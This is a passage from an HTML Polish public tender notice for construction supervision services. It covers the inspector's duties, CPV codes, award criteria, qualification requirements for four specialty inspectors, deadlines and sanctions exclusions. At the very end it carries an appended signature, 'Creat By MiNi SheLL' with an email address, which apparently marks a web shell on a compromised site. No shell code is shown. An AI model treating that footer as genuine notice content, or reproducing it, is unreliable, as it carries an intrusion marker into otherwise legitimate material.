Pełnienie nadzoru inwestorskiego w ramach zawartej Umowy;<br/>5)	Uczestnictwo w cotygodniowych naradach technicznych i co miesięcznych radach budowy z udziałem Inspektorów Nadzoru, Kierownika Budowy, przedstawicieli Podwykonawców robót oraz przedstawicieli Zamawiającego; <br/>6)	Sprawdzanie zgodności wykonywanych robót budowlanych z projektem i pozwoleniem na budowę, przepisami prawa i zasadami wiedzy technicznej; <br/>7)	Sprawdzanie i potwierdzanie jakości dostarczanych przez Wykonawcę robót: materiałów budowlanych, urządzeń, wyposażenia, i innych elementów robót wymaganych zapisami Kontraktu, w sposób i na zasadach w nim opisanych;<br/>8)	Sprawdzanie dokumentów, zezwoleń, deklaracji właściwości użytkowych, certyfikatów itd., w celu uniknięcia użycia materiałów niezgodnych z projektem, uszkodzonych lub niemających wymaganych certyfikatów;<br/>9)	Sprawdzanie i zaakceptowanie przedłożonych przez Wykonawcę robót (w formie pisemnej) harmonogramów rzeczowo-finansowych wraz z ich aktualizacjami;<br/>10)	Potwierdzanie i sprawdzanie stanu mobilizacji i zapewnienia sprzętu na Terenie Budowy jako odpowiedni lub nie dla wykonywanych robót budowlanych i jako zgodny lub nie z Kontraktem;<br/>11)	Nadzór nad obsługą geodezyjną Wykonawcy robót budowlanych;<br/>12)	Dokonywanie kontroli w czasie dostarczania materiałów i urządzeń, które będą niezbędne do realizacji robót,<br/>13)	Zapewnienie kontroli nad sposobem składowania i przechowywania materiałów;<br/>14)	Sprawdzanie jakości oraz zgodności materiałów budowlanych i instalacyjnych z Kontraktem, organizowanie dodatkowych testów jakości, jeśli będzie to konieczne, polegających na zleceniu dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne, przy czym dodatkowe testy wykonywane będą na koszt Wykonawcy robót – w przypadku użycia przez Wykonawcę materiału niezgodnego z Kontraktem;<br/>15)	Sprawdzanie poprawności wykonania i odbieranie Robót ulegających zakryciu lub zanikających;<br/>16)	Uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych. Potwierdzanie faktycznie wykonanych robót budowlanych oraz usuniętych wad/usterek;<br/>17)	Wprowadzanie w trakcie realizacji robót (w porozumieniu z Nadzorem Autorskim), zaleceń Zamawiającego;<br/>18)	Bieżące dokonywanie z projektantami stosownych uzgodnień oraz egzekwowanie uzupełnień w ramach prowadzonego nadzoru autorskiego i uzgadnianie z nimi ewentualnych zmian, wprowadzonych przez Zamawiającego i /lub Wykonawcę robót;<br/>19)	Informowanie Zamawiającego o konieczności wykonania robót dodatkowych, uzupełniających i innych zgodnie z Kontraktem;<br/>20)	Przygotowywanie i przedkładanie Zamawiającemu kosztorysów dotyczących robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, a także opiniowanie ich zasadności oraz dokonywanie ich kontroli w trakcie realizacji;<br/>21)	Analizowanie i weryfikowanie zgodności z zapisami Kontraktu, dokumentów sporządzanych przez Wykonawcę robót i projektantów, na etapie realizacji Kontraktu, wraz z ich pisemną opinią;<br/>22)	Przygotowywanie i przedkładanie Zamawiającemu protokołów konieczności robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, wraz z kosztorysami dotyczącymi tych robót, a także opiniowanie ich zasadności, odpowiednio do nadzorowanego zakresu robót;<br/>23)	Wystawianie protokołów upoważniających Wykonawców robót do wystawiania faktur wraz z ustalaniem wartości wykonanych robót, na zasadach i w sposób określony w Kontrakcie;<br/>24)	Przeprowadzanie regularnych inspekcji Terenu Budowy sprawdzających w szczególności prawidłowość i jakość wykonywanych robót, przestrzeganie przepisów BiHP, jakość używanych materiałów, itp.;<br/>25)	Wydawanie Wykonawcy robót, Kierownikowi budowy lub Kierownikowi robót, poleceń dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych, potwierdzonych wpisem do Dziennika Budowy;<br/>26)	Żądanie od Wykonawcy, Kierownika budowy lub Kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót budowlanych, a także wstrzymania ich dalszego wykonywania w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;<br/>27)	Nadzór nad właściwym wywiązywaniem się z Kontraktu przez Wykonawcę robót; <br/>28)	Monitorowanie zgodności postępu rzeczowego i finansowego robót budowlanych z zatwierdzonym harmonogramem rzeczowo-finansowym;<br/>29)	Niezwłoczne sprawdzanie zestawień ilości i wartości wykonanych robót, będących podstawą do rozliczeń finansowych Zamawiającego z Wykonawcą robót budowlanych, odpowiednio do zakresu nadzorowanych robót;<br/>30)	Przeprowadzanie przy udziale Zamawiającego odbiorów częściowych oraz odbioru końcowego w sposób i zgodnie z zapisami Kontraktu; <br/>31)	Nadzorowanie i dopilnowanie zaleceń komisji odbiorowej dotyczących usunięcia przez Wykonawcę robót stwierdzonych usterek dających się naprawić; <br/>32)	Opracowanie opinii dotyczącej wad obiektu uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia Wykonawcy robót z określeniem utraty wartości robót budowlanych i kwot obniżonego wynagrodzenia za te roboty;<br/>33)	Opiniowanie proponowanych metod wykonania robót budowlanych zaproponowanych przez Wykonawcę robót;<br/>34)	Uzgadnianie z Zamawiającym wszelkich propozycji zmian dotyczących zakresu, technologii i wartości robót budowlanych;<br/>35)	Sprawdzanie rozwiązań zamiennych i wnioskowanie do Zamawiającego o ich zastosowanie;<br/>36) Zatwierdzanie rysunków wykonawczych i warsztatowych sporządzonych przez Wykonawcę robót budowlanych;<br/>37) Informowanie Zamawiającego z odpowiednim wyprzedzeniem o wszelkich zagrożeniach występujących podczas realizacji robót oraz podejmowanych działaniach zapobiegawczych i naprawczych;<br/>38) Sprawdzenie poprawności opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, w sposób i na warunkach określonych w Kontrakcie;<br/>39) Przygotowanie, w przypadku przerwania robót budowlanych przez Wykonawcę robót, inwentaryzacji wykonanych robót wykonanych do dnia ich przerwania;<br/>40) W przypadku przerwania Kontraktu, wykonywanie wszelkich czynności związanych z tym przerwaniem, w tym co najmniej nadzór nad przejęciem placu budowy, nad robotami zabezpieczającymi itp.;<br/>41) W przypadku rozliczenia obmiarowego z Wykonawcą Robót, zweryfikowanie i pisemne zatwierdzenie obmiarów robót wykonanych przez Wykonawcę robót;<br/>42) Sprawdzanie Wniosków o płatność wystawianych przez Wykonawcę robót. Pozostały zakres obowiązków zawarto w Rozdziale IV pkt 6 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wezwanie Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>na zasadach określonych w Rozdziale IX SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/><br/>CZĘŚĆ 1<br/>W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda skierowania do realizacji zamówienia, co najmniej:<br/>a)	jednej osoby inspektora nadzoru robót drogowych, która będzie pełnić funkcję inspektora nadzoru branży drogowej, posiadającej łącznie:<br/>-uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów,<br/>oraz<br/>­-co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub kierownika robót lub inspektora nadzoru inwestorskiego, w zakresie ww. uprawnień budowlanych liczone od daty uzyskania uprawnień, koordynującej pracą inspektorów nadzoru inwestorskiego pozostałych branż.<br/>CZĘŚĆ 2<br/>W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda skierowania do realizacji zamówienia, co najmniej:<br/>a)	jednej osoby inspektora nadzoru, która będzie pełnić funkcję inspektora nadzoru branży sanitarnej, posiadającej łącznie:<br/>-uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów,<br/>oraz<br/>-co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub kierownika robót lub inspektora nadzoru inwestorskiego, w zakresie ww. uprawnień budowlanych liczone od daty uzyskania uprawnień,<br/><br/>CZĘŚĆ 3<br/>W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda skierowania do realizacji zamówienia, co najmniej:<br/>a)	jednej osoby, która będzie pełnić funkcję inspektora nadzoru branży elektrycznej, posiadającej łącznie:<br/>­- uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów,<br/>oraz<br/>­-co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub kierownika robót lub inspektora nadzoru inwestorskiego, w zakresie ww. uprawnień budowlanych liczone od daty uzyskania uprawnień,<br/>CZĘŚĆ 4<br/>W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda skierowania do realizacji zamówienia, co najmniej:<br/>a)	jednej osoby, która będzie pełnić funkcję inspektora nadzoru branży teletechnicznej posiadającej łącznie:<br/>-uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów<br/>oraz<br/>­-co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub kierownika robót lub inspektora nadzoru inwestorskiego, w zakresie ww. uprawnień budowlanych liczone od daty uzyskania uprawnień. <br/><br/>Kierownik robót powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2025 poz. 418). Dopuszcza się ważne, odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów. W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. (t.j. Dz.U. 2023 poz. 334) o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia, o których mowa w Rozdziale IX pkt 1 SWZ, Zamawiający wymaga złożenia: odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, dotyczących zdolności technicznej lub zawodowej, o których mowa w Rozdziale VIII pkt 2, podmiotowe środki dowodowe wymagane od wykonawcy obejmują wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w zakresie niezbędnym do wykazania spełnienia warunku opisanego w Rozdziale VIII pkt 2 SWZ, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, wraz z załączeniem posiadanych uprawnień i przynależności do izby inżynierów budownictwa a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie <br/>z Załącznikiem nr 5A-5D do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: PLATFORMAZAKUPOWA.PL</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-19 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ust. 1 ustawy z postępowania o udzielenie zamówienia publicznego zamawiający wyklucza:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z 29 września 1994 r. o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3. Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z.p .

Creat By MiNi SheLL
Email: jattceo@gmail.com